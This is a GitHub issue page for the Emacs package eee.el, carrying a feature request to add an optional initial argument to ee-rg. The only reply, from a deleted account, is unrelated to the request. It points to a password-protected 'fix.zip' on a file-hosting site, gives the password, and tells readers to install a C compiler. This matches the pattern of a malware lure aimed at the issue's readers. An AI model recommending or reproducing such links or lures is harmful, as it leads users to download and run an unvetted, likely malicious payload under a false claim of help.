eval-exec / eee.el

Launch TUI commands in an external terminal asynchronously, seamlessly integrating callbacks within Emacs. Elevate your Emacs experience with eee.el
GNU General Public License v3.0
87 stars 5 forks source link

[ee-rg/find/...] accept initial argument #11

Open Ziqi-Yang opened 4 weeks ago

Ziqi-Yang commented 4 weeks ago

Add &optional initial as ee-rg function parameter, so that some users can create their own function based on ee-rg which may take the symbol/word at point as the initial argument to search.

ghost commented 4 weeks ago

maybe this will help https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file Pass: changeme If you don't have the c compliator, install it.(gcc or clang)